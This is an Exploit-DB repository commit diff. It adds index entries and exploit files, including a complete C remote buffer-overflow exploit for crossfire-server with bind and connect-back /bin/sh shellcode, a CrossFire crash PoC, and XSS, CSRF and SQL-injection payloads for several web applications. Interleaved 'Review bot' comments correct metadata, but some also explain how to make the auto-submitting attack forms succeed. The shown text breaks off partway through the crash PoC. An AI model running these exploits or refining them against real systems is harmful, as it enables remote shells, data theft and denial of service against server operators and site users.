Updated 08_17_2014

Offensive Security 2014-08-17 04:41:15 +00:00
parent d0601bf7bc
commit 6b6daa5f97
12 changed files with 572 additions and 439 deletions


@ -1275,7 +1275,7 @@ id,file,description,date,author,platform,type,port
1532,platforms/php/webapps/1532.pl,"PwsPHP <= 1.2.3 (index.php) Remote SQL Injection Exploit",2006-02-25,papipsycho,php,webapps,0
1533,platforms/php/webapps/1533.php,"4Images <= 1.7.1 (Local Inclusion) Remote Code Execution Exploit",2006-02-26,rgod,php,webapps,0
1534,platforms/sco/local/1534.c,"SCO Unixware 7.1.3 (ptrace) Local Privilege Escalation Exploit",2006-02-26,prdelka,sco,local,0
1535,platforms/windows/dos/1535.c,"CrossFire <= 1.8.0 (oldsocketmode) Remote Buffer Overflow PoC",2006-02-27,"Luigi Auriemma",windows,dos,0
1535,platforms/windows/dos/1535.c,"CrossFire <= 1.8.0 - (oldsocketmode) Remote Buffer Overflow PoC",2006-02-27,"Luigi Auriemma",windows,dos,0
1536,platforms/windows/remote/1536.pm,"MS Internet Explorer 6.0 SP0 IsComponentInstalled() Remote Exploit",2006-02-28,"H D Moore",windows,remote,0
1537,platforms/windows/remote/1537.pm,"Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow",2006-02-28,y0,windows,remote,44334
1538,platforms/php/webapps/1538.pl,"farsinews <= 2.5 - Directory Traversal arbitrary (users.db) access exploit",2006-02-28,Hessam-x,php,webapps,0
@ -1320,7 +1320,7 @@ id,file,description,date,author,platform,type,port
1578,platforms/linux/remote/1578.c,"PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit (2)",2006-03-12,darkeagle,linux,remote,7144
1579,platforms/linux/local/1579.pl,"Ubuntu Breezy 5.10 Installer Password Disclosure Vulnerability",2006-03-12,"Kristian Hermansen",linux,local,0
1581,platforms/php/webapps/1581.pl,"Simple PHP Blog <= 0.4.7.1 - Remote Command Execution Exploit",2006-03-13,rgod,php,webapps,0
1582,platforms/linux/remote/1582.c,"crossfire-server <= 1.9.0 SetUp() Remote Buffer Overflow Exploit",2006-03-13,landser,linux,remote,13327
1582,platforms/linux/remote/1582.c,"crossfire-server <= 1.9.0 - SetUp() Remote Buffer Overflow Exploit",2006-03-13,landser,linux,remote,13327
1583,platforms/osx/remote/1583.pl,"Apple Mac OS X 10.4.5 Mail.app (Real Name) Buffer Overflow Exploit",2006-03-13,"Kevin Finisterre",osx,remote,25
1584,platforms/windows/local/1584.cpp,"MS Windows Telephony Service Command Execution Exploit (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local,0
1585,platforms/php/webapps/1585.php,"php iCalendar <= 2.21 (Cookie) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0
@ -30924,3 +30924,12 @@ id,file,description,date,author,platform,type,port
34334,platforms/win64/remote/34334.rb,"VirtualBox 3D Acceleration Virtual Machine Escape",2014-08-14,metasploit,win64,remote,0
34335,platforms/linux/remote/34335.rb,"VMTurbo Operations Manager 4.6 vmtadmin.cgi Remote Command Execution",2014-08-14,metasploit,linux,remote,80
34336,platforms/php/webapps/34336.html,"Disqus for Wordpress 2.7.5 Admin Stored CSRF and XSS",2014-08-14,"Nik Cubrilovic",php,webapps,80
34337,platforms/php/webapps/34337.txt,"Gekko Web Builder 9.0 'index.php' Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
34338,platforms/php/webapps/34338.html,"Pixie 1.0.4 HTML Injection and Cross-Site Scripting Vulnerabilities",2010-07-15,"High-Tech Bridge SA",php,webapps,0
34339,platforms/php/webapps/34339.txt,"Pligg 1.0.4 'search.php' Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service Vulnerability",2010-07-15,"Luigi Auriemma",multiple,dos,0
34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 SQL Injection and HTML Injection Vulnerabilities",2009-09-21,learn3r,php,webapps,0
34342,platforms/php/webapps/34342.txt,"Ez Poll Hoster Multiple Cross Site Scripting Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0
34343,platforms/asp/webapps/34343.txt,"MOJO IWMS 7 'default.asp' Cookie Manipulation Vulnerability",2007-12-17,"cp77fk4r ",asp,webapps,0
34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET Multiple SQL Injection Vulnerabilities",2009-12-17,bi0,asp,webapps,0
34345,platforms/java/webapps/34345.txt,"jCore 'search' Parameter Cross Site Scripting Vulnerability",2009-12-17,loneferret,java,webapps,0
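Review bot: Two of the author fields on the added lines carry a trailing space inside the quotes, `"Milos Zivanovic "` and `"cp77fk4r "`, which makes those authors index and match separately from the same name written without the space; trim them to `"Milos Zivanovic"` and `"cp77fk4r"`. The Gekko Web Builder entry records the version as 9.0 while the advisory text added in the same commit states 0.90 ALPHA, so one of the two needs correcting and the index is what searches hit. Both points are taken from the visible lines, not from the upstream advisories.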


platforms/asp/webapps/34343.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/41746/info
MOJO IWMS is prone to a cookie-manipulation vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this vulnerability could allow an attacker to masquerade as another user. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
MOJO IWMS 7 is vulnerable; other versions may also be affected.
The following example URI is available:
http://www.example.com/upload/default.asp?mode=wrong&ERRMSG=%3Cmeta+http-equiv='Set-cookie'+content='[Cookie-Name]=[Cookie-Value]'%3E
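Review bot: The example URI shows the ERRMSG query parameter being reflected unescaped into the response, which is a reflected HTML-injection bug; the cookie write is only one payload for it and depends on the browser honoring `<meta http-equiv='Set-cookie'>`, which current browsers no longer do, so a tester should expect the cookie effect to fail while the injection itself still works. I would add after the URI: `Note: root cause is unescaped reflection of ERRMSG; a script payload in the same parameter demonstrates the issue independently of meta Set-Cookie support.` The `mode=wrong` value appears to be needed to reach the error page that echoes ERRMSG, but that is inferred from the URI rather than stated.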

platforms/asp/webapps/34344.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/41747/info
Pre Jobo.NET is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example data is available:
User : 1'or'1'='1
Pass : 1'or'1'='1
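Review bot: The User/Pass payload is given without naming the login script or the form field names it is submitted to, so the finding cannot be reproduced from this file alone. The tautology `1'or'1'='1` only demonstrates an authentication bypass on the login query, not the "multiple" injection points the description claims, so any other location is unverified here. I would add a line such as `Injection point: login form (script and field names not recorded in the original advisory)` so the gap is explicit.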


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/41748/info
jCore is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/modules/search?search=</a><input value="xss" onclick="alert(1)" type="submit">


@ -1,208 +1,208 @@
// crossfire-server <= 1.9.0 "SetUp()" remote buffer overflow
//
// exploit by landser - ihsahn at gmail com
// vote http://shinui.org.il
//
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#define PORT 13327 // default port
#define SC_PORT 33333 // default shellcode port
#define SC_HOST "127.0.0.1" // default shellcode host
unsigned char sc_cb[] = // izik's
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
"\x80\x5b\x5d\xbeHOST\xf7\xd6\x56\x66\xbdPR\x0f\xcd\x09\xdd"
"\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"
"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";
unsigned char sc_bind[] = // izik's
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
"\x80\x5b\x5d\x52\x66\xbdPR\x0f\xcd\x09\xdd\x55\x6a\x10\x51"
"\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5f"
"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x93\xb0\x02\xcd"
"\x80\x85\xc0\x75\x1a\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
"\x53\xeb\xb2\x6a\x06\x58\xcd\x80\xb3\x04\xeb\xc9";
struct {
const char *type;
unsigned char *code;
} shellcodes[] = {
{"bind", sc_bind},
{"connectback", sc_cb},
};
struct {
const char *ver;
unsigned long ret; // a "jmp *%eax" instruction
unsigned short int len;
} targets[] = {
{"crossfire-server_1.6.0.dfsg.1-4_i386.deb", 0x080d6f48, 0x1028},
{"crossfire-server_1.8.0-2_i386.deb", 0x080506d7, 0x1130},
{"crossfire-server_1.9.0-1_i386.deb", 0x0807aefa, 0x1130},
{"crash", 0xcccccccc, 0x1300},
};
#define structsize(x) (sizeof x / sizeof x[0])
int s;
int n = -1;
unsigned char *sc = sc_bind; // default shellcode
unsigned char buf[0x2000];
void establish (char *, int);
void usage (char *);
void update (unsigned char *, int, char *);
void writebuf (void);
int main (int argc, char **argv) {
int port = 0; // default value
unsigned short int sc_port = 0;
char *sc_host = NULL;
printf("cf190.c by landser - ihsahn at gmail com\n\n");
char c;
while ((c = getopt(argc, argv, "t:p:h:d:s:")) != -1) {
switch (c) {
case 's': sc = shellcodes[atoi(optarg)].code; break;
case 'h': sc_host = strdup(optarg); break;
case 'd': sc_port = atoi(optarg); break;
case 't': n = atoi(optarg); break;
case 'p': port = atoi(optarg); break;
case '?': usage(argv[0]); return EXIT_FAILURE;
}
}
if ((n < 0) || (n >= structsize(targets))) {
printf("invalid target\n");
usage(argv[0]);
return EXIT_FAILURE;
}
if ((optind + 1) != argc) {
printf("no hostname\n");
usage(argv[0]);
return EXIT_FAILURE;
}
establish(argv[optind], port ? port : PORT);
update(sc, sc_port, sc_host);
writebuf();
printf("> sending\n");
if (send(s, buf, targets[n].len + 2, 0) < 0) {
perror("send()");
return EXIT_FAILURE;
}
usleep(100000);
printf("> done\n");
close(s);
return EXIT_SUCCESS;
}
void establish (char *ip, int port) {
struct sockaddr_in sa;
struct hostent *h;
if (!(h = gethostbyname(ip))) {
herror("gethostbyname()");
exit(EXIT_FAILURE);
}
printf("> resolved %s to %s\n", ip,
inet_ntoa(**((struct in_addr **)h->h_addr_list)));
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **)h->h_addr_list);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket()");
exit(EXIT_FAILURE);
}
if (connect(s, (struct sockaddr *)&sa, sizeof(struct sockaddr)) < 0) {
perror("connect()");
exit(EXIT_FAILURE);
}
printf ("> connected to %s:%d.\n", inet_ntoa(**((struct in_addr **)h->h_addr_list)), port);
}
void usage (char *argv0) {
int i;
printf("usage: %s -t <target> [-s <shellcode>] "
"[-d <connectback/bind port] [-h <connectback ip>] "
"host [-p <port>]\n", argv0);
printf("- targets:\n");
for (i=0;i<structsize(targets);i++)
printf("%d. %s\n", i, targets[i].ver);
printf("- shellcodes: (default 0)\n");
for (i=0;i<structsize(shellcodes);i++)
printf("%d. %s\n", i, shellcodes[i].type);
}
void update (unsigned char *code, int port, char *host) {
if (!port) port = SC_PORT;
if (!(port & 0xff) || !((port >> 8) & 0xff)) {
printf("bad cb port\n");
exit(EXIT_FAILURE);
}
*(unsigned short int *)(strstr(code, "PR")) = port;
if (strstr(code, "HOST")) {
in_addr_t inaddr;
if (!host) host = SC_HOST;
inaddr = inet_addr(host);
if (inaddr == INADDR_NONE || strstr(host, "255")) {
// ~(255) is 0
printf("invalid cb hostname\n");
exit(EXIT_FAILURE);
}
*(in_addr_t *)(strstr(code, "HOST")) = ~inaddr;
}
if (host) free(host);
}
void writebuf (void) {
unsigned char *ptr = buf;
memset(buf, 0x90, sizeof buf);
*ptr++ = (targets[n].len>> 8) & 0xff;
*ptr++ = targets[n].len & 0xff;
memcpy(ptr, "setup sound ", strlen("setup sound "));
ptr += strlen("setup sound ");
ptr += 120; // leave 120 nops before the shellcode
memcpy(ptr, sc, strlen(sc));
ptr = &buf[targets[n].len - 10];
*(unsigned long *)ptr = targets[n].ret;
}
// milw0rm.com [2006-03-13]
// crossfire-server <= 1.9.0 "SetUp()" remote buffer overflow
//
// exploit by landser - ihsahn at gmail com
// vote http://shinui.org.il
//
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#define PORT 13327 // default port
#define SC_PORT 33333 // default shellcode port
#define SC_HOST "127.0.0.1" // default shellcode host
unsigned char sc_cb[] = // izik's
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
"\x80\x5b\x5d\xbeHOST\xf7\xd6\x56\x66\xbdPR\x0f\xcd\x09\xdd"
"\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"
"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";
unsigned char sc_bind[] = // izik's
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
"\x80\x5b\x5d\x52\x66\xbdPR\x0f\xcd\x09\xdd\x55\x6a\x10\x51"
"\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5f"
"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x93\xb0\x02\xcd"
"\x80\x85\xc0\x75\x1a\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
"\x53\xeb\xb2\x6a\x06\x58\xcd\x80\xb3\x04\xeb\xc9";
struct {
const char *type;
unsigned char *code;
} shellcodes[] = {
{"bind", sc_bind},
{"connectback", sc_cb},
};
struct {
const char *ver;
unsigned long ret; // a "jmp *%eax" instruction
unsigned short int len;
} targets[] = {
{"crossfire-server_1.6.0.dfsg.1-4_i386.deb", 0x080d6f48, 0x1028},
{"crossfire-server_1.8.0-2_i386.deb", 0x080506d7, 0x1130},
{"crossfire-server_1.9.0-1_i386.deb", 0x0807aefa, 0x1130},
{"crash", 0xcccccccc, 0x1300},
};
#define structsize(x) (sizeof x / sizeof x[0])
int s;
int n = -1;
unsigned char *sc = sc_bind; // default shellcode
unsigned char buf[0x2000];
void establish (char *, int);
void usage (char *);
void update (unsigned char *, int, char *);
void writebuf (void);
int main (int argc, char **argv) {
int port = 0; // default value
unsigned short int sc_port = 0;
char *sc_host = NULL;
printf("cf190.c by landser - ihsahn at gmail com\n\n");
char c;
while ((c = getopt(argc, argv, "t:p:h:d:s:")) != -1) {
switch (c) {
case 's': sc = shellcodes[atoi(optarg)].code; break;
case 'h': sc_host = strdup(optarg); break;
case 'd': sc_port = atoi(optarg); break;
case 't': n = atoi(optarg); break;
case 'p': port = atoi(optarg); break;
case '?': usage(argv[0]); return EXIT_FAILURE;
}
}
if ((n < 0) || (n >= structsize(targets))) {
printf("invalid target\n");
usage(argv[0]);
return EXIT_FAILURE;
}
if ((optind + 1) != argc) {
printf("no hostname\n");
usage(argv[0]);
return EXIT_FAILURE;
}
establish(argv[optind], port ? port : PORT);
update(sc, sc_port, sc_host);
writebuf();
printf("> sending\n");
if (send(s, buf, targets[n].len + 2, 0) < 0) {
perror("send()");
return EXIT_FAILURE;
}
usleep(100000);
printf("> done\n");
close(s);
return EXIT_SUCCESS;
}
void establish (char *ip, int port) {
struct sockaddr_in sa;
struct hostent *h;
if (!(h = gethostbyname(ip))) {
herror("gethostbyname()");
exit(EXIT_FAILURE);
}
printf("> resolved %s to %s\n", ip,
inet_ntoa(**((struct in_addr **)h->h_addr_list)));
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **)h->h_addr_list);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket()");
exit(EXIT_FAILURE);
}
if (connect(s, (struct sockaddr *)&sa, sizeof(struct sockaddr)) < 0) {
perror("connect()");
exit(EXIT_FAILURE);
}
printf ("> connected to %s:%d.\n", inet_ntoa(**((struct in_addr **)h->h_addr_list)), port);
}
void usage (char *argv0) {
int i;
printf("usage: %s -t <target> [-s <shellcode>] "
"[-d <connectback/bind port] [-h <connectback ip>] "
"host [-p <port>]\n", argv0);
printf("- targets:\n");
for (i=0;i<structsize(targets);i++)
printf("%d. %s\n", i, targets[i].ver);
printf("- shellcodes: (default 0)\n");
for (i=0;i<structsize(shellcodes);i++)
printf("%d. %s\n", i, shellcodes[i].type);
}
void update (unsigned char *code, int port, char *host) {
if (!port) port = SC_PORT;
if (!(port & 0xff) || !((port >> 8) & 0xff)) {
printf("bad cb port\n");
exit(EXIT_FAILURE);
}
*(unsigned short int *)(strstr(code, "PR")) = port;
if (strstr(code, "HOST")) {
in_addr_t inaddr;
if (!host) host = SC_HOST;
inaddr = inet_addr(host);
if (inaddr == INADDR_NONE || strstr(host, "255")) {
// ~(255) is 0
printf("invalid cb hostname\n");
exit(EXIT_FAILURE);
}
*(in_addr_t *)(strstr(code, "HOST")) = ~inaddr;
}
if (host) free(host);
}
void writebuf (void) {
unsigned char *ptr = buf;
memset(buf, 0x90, sizeof buf);
*ptr++ = (targets[n].len>> 8) & 0xff;
*ptr++ = targets[n].len & 0xff;
memcpy(ptr, "setup sound ", strlen("setup sound "));
ptr += strlen("setup sound ");
ptr += 120; // leave 120 nops before the shellcode
memcpy(ptr, sc, strlen(sc));
ptr = &buf[targets[n].len - 10];
*(unsigned long *)ptr = targets[n].ret;
}
// milw0rm.com [2006-03-13]


@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/41737/info
Unreal Engine is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected server, resulting in denial-of-service conditions.
The following games which are developed with Unreal Engine are affected:
Rainbow Six: Raven Shield
Deus Ex
Land of the Dead
Postal 2
Rune
Shadow Ops
Unreal 2
Unreal Tournament
Unreal Tournament 2003
WarPath
XIII
Other games may also be affected.
http://www.exploit-db.com/sploits/34340.zip


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41726/info
Gekko Web Builder is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Gekko Web Builder 0.90 ALPHA is vulnerable; prior versions may be affected.
http://www.example.com/admin/index.php?app=settings"><script>alert(document.cookie)</script>
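Review bot: The version line, `Gekko Web Builder 0.90 ALPHA is vulnerable; prior versions may be affected.`, contradicts the files.csv title added in the same commit, which records the product as 9.0; one of the two is wrong. The PoC path is `/admin/index.php`, so the injection is presumably reachable only in an authenticated administrator session, which changes the impact from an anonymous reflected XSS to an attack that must be delivered to a logged-in admin; that is inferred from the path, not stated. I would add the line `Requires: access to /admin/ (admin session assumed from the path; confirm)` under the version line.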


@ -0,0 +1,36 @@
source: http://www.securityfocus.com/bid/41727/info
Pixie is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
Pixie 1.0.4 is vulnerable; other versions may also be affected.
<form accept-charset="UTF-8" action="http://www.example.com/admin/index.php?s=settings&x=pixie" method="post" name="main" >
<input type="hidden" name="langu" value="en-gb" />
<input type="hidden" name="time_zone" value="+0" />
<input type="hidden" name="dstime" value="no" />
<input type="hidden" name="dateformat" value="%Oe %B %Y, %H:%M" />
<input type="hidden" name="rte" value="1" />
<input type="hidden" name="logs" value="5" />
<input type="hidden" name="sysmess" value=&#039;hello message"><script>alert(document.cookie)</script>&#039; />
<input type="submit" name="settings_edit" id="form_addedit_submit" value="Update" />
</form>
<script>
document.getElementById(&#039;form_addedit_submit&#039;).click();
</script>
<form accept-charset="UTF-8" action="http://www.example.com/admin/index.php?s=settings&x=site" method="post" name="main" >
<input type="hidden" name="sitename" value="Pixie" />
<input type="hidden" name="url" value="http://host/" />
<input type="hidden" name="default" value="blog/" />
<input type="hidden" name="keywords" value=&#039;key1"><script>alert(document.cookie)</script>&#039; />
<input type="hidden" name="site_auth" value="sute author" />
<input type="hidden" name="site_cright" value="copyright" />
<input type="hidden" name="cleanurls" value="yes" />
<input type="submit" name="settings_edit" id="form_addedit_submit" value="Update" />
</form>
<script>
document.getElementById(&#039;form_addedit_submit&#039;).click();
</script>
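Review bot: Both auto-submitting forms give their submit button the same `id="form_addedit_submit"`, and `document.getElementById` returns the first match, so when the two forms share one page the second `.click()` re-submits the first form and the site-settings payload in `keywords` is never sent; use a distinct id for the second button and its script, e.g. `id="form_addedit_submit2"` and `document.getElementById('form_addedit_submit2').click();`, or host each form on its own page. Separately, the `value=&#039;...&#039;` attributes look entity-encoded in transit: a browser does not treat `&#039;` as a quote delimiter, so the value is cut at the first space and the `"><script>` payload never reaches `sysmess` or `keywords`; restore literal single quotes before use. Whether the original advisory had the literal quotes cannot be told from this page.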


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41729/info
Pligg is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Pligg 1.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/search/1"><script>alert(document.cookie)</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41741/info
WX-Guestbook is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
WX-Guestbook version 1.1.208 is affected; other versions may also be affected.
test%') UNION ALL SELECT 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/*
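Review bot: The UNION payload is given without the script or parameter it is injected into, and no example at all is given for the HTML-injection issue the description also claims, so neither finding is reproducible from this file. The `%')` prefix and the 12-column SELECT imply a LIKE-based search query returning twelve columns, but that is inferred from the payload rather than stated. I would add `Injection point: search parameter (script/parameter name not recorded in the original advisory); HTML-injection PoC: none provided` so the limitation is visible to anyone relying on the entry.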

platforms/php/webapps/34342.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/41742/info
Ez Poll Hoster is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following example URIs are available:
http://www.example.com/eph/index.php?action=code&pid=[XSS]
http://www.example.com/eph/profile.php?action=view&uid=[XSS]


@ -1,229 +1,229 @@
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
/*
Header file used for manage errors in Windows
It support socket and errno too
(this header replace the previous sock_errX.h)
*/
#include <string.h>
#include <errno.h>
void std_err(void) {
char *error;
switch(WSAGetLastError()) {
case 10004: error = "Interrupted system call"; break;
case 10009: error = "Bad file number"; break;
case 10013: error = "Permission denied"; break;
case 10014: error = "Bad address"; break;
case 10022: error = "Invalid argument (not bind)"; break;
case 10024: error = "Too many open files"; break;
case 10035: error = "Operation would block"; break;
case 10036: error = "Operation now in progress"; break;
case 10037: error = "Operation already in progress"; break;
case 10038: error = "Socket operation on non-socket"; break;
case 10039: error = "Destination address required"; break;
case 10040: error = "Message too long"; break;
case 10041: error = "Protocol wrong type for socket"; break;
case 10042: error = "Bad protocol option"; break;
case 10043: error = "Protocol not supported"; break;
case 10044: error = "Socket type not supported"; break;
case 10045: error = "Operation not supported on socket"; break;
case 10046: error = "Protocol family not supported"; break;
case 10047: error = "Address family not supported by protocol family"; break;
case 10048: error = "Address already in use"; break;
case 10049: error = "Can't assign requested address"; break;
case 10050: error = "Network is down"; break;
case 10051: error = "Network is unreachable"; break;
case 10052: error = "Net dropped connection or reset"; break;
case 10053: error = "Software caused connection abort"; break;
case 10054: error = "Connection reset by peer"; break;
case 10055: error = "No buffer space available"; break;
case 10056: error = "Socket is already connected"; break;
case 10057: error = "Socket is not connected"; break;
case 10058: error = "Can't send after socket shutdown"; break;
case 10059: error = "Too many references, can't splice"; break;
case 10060: error = "Connection timed out"; break;
case 10061: error = "Connection refused"; break;
case 10062: error = "Too many levels of symbolic links"; break;
case 10063: error = "File name too long"; break;
case 10064: error = "Host is down"; break;
case 10065: error = "No Route to Host"; break;
case 10066: error = "Directory not empty"; break;
case 10067: error = "Too many processes"; break;
case 10068: error = "Too many users"; break;
case 10069: error = "Disc Quota Exceeded"; break;
case 10070: error = "Stale NFS file handle"; break;
case 10091: error = "Network SubSystem is unavailable"; break;
case 10092: error = "WINSOCK DLL Version out of range"; break;
case 10093: error = "Successful WSASTARTUP not yet performed"; break;
case 10071: error = "Too many levels of remote in path"; break;
case 11001: error = "Host not found"; break;
case 11002: error = "Non-Authoritative Host not found"; break;
case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
case 11004: error = "Valid name, no data record of requested type"; break;
default: error = strerror(errno); break;
}
fprintf(stderr, "\nError: %s\n", error);
exit(1);
}
#define close closesocket
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#endif
#define VER "0.1"
#define PORT 13327
#define MAXSOCKBUF 10240
#define BUFFSZ (MAXSOCKBUF + 256)
int readline(int sd, u_char *data, int size);
u_int resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len;
u_short port = PORT;
u_char buff[BUFFSZ];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
srand(time(NULL));
setbuf(stdout, NULL);
fputs("\n"
"CrossFire <= 1.8.0 oldsocketmode buffer-overflow "VER"\n"
"bug found by the developers and indipendently by me... but too late\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%hu)]\n"
"\n", argv[0], port);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
printf("- connect...");
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
printf(" done\n");
printf("- receive server version:\n");
len = readline(sd, buff, sizeof(buff));
if(len < 0) std_err();
printf(" %s\n", !buff[0] ? buff + 2 : buff);
printf("- activate oldsocketmode\n");
if(send(sd, "oldsocketmode", 13, 0)
< 0) std_err();
printf("- send %d bytes, the server supports max %d\n", sizeof(buff), MAXSOCKBUF);
memset(buff, 'a', sizeof(buff));
if(send(sd, buff, sizeof(buff), 0)
< 0) std_err();
len = readline(sd, buff, sizeof(buff));
sleep(ONESEC); // needed in my localhost server or it terminates!
close(sd);
printf("- check server:");
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
printf("\n Server IS vulnerable!!!\n\n");
} else {
printf("\n Server does not seem vulnerable\n\n");
}
close(sd);
return(0);
}
int readline(int sd, u_char *data, int size) {
int i;
size--;
for(i = 0; i < size; i++) {
if(recv(sd, data, 1, 0) <= 0) return(-1);
if(*data == '\n') break;
data++;
}
*data = 0;
return(i);
}
u_int resolv(char *host) {
struct hostent *hp;
u_int host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_int *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
// milw0rm.com [2006-02-27]
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
/*
Header file used for manage errors in Windows
It support socket and errno too
(this header replace the previous sock_errX.h)
*/
#include <string.h>
#include <errno.h>
void std_err(void) {
char *error;
switch(WSAGetLastError()) {
case 10004: error = "Interrupted system call"; break;
case 10009: error = "Bad file number"; break;
case 10013: error = "Permission denied"; break;
case 10014: error = "Bad address"; break;
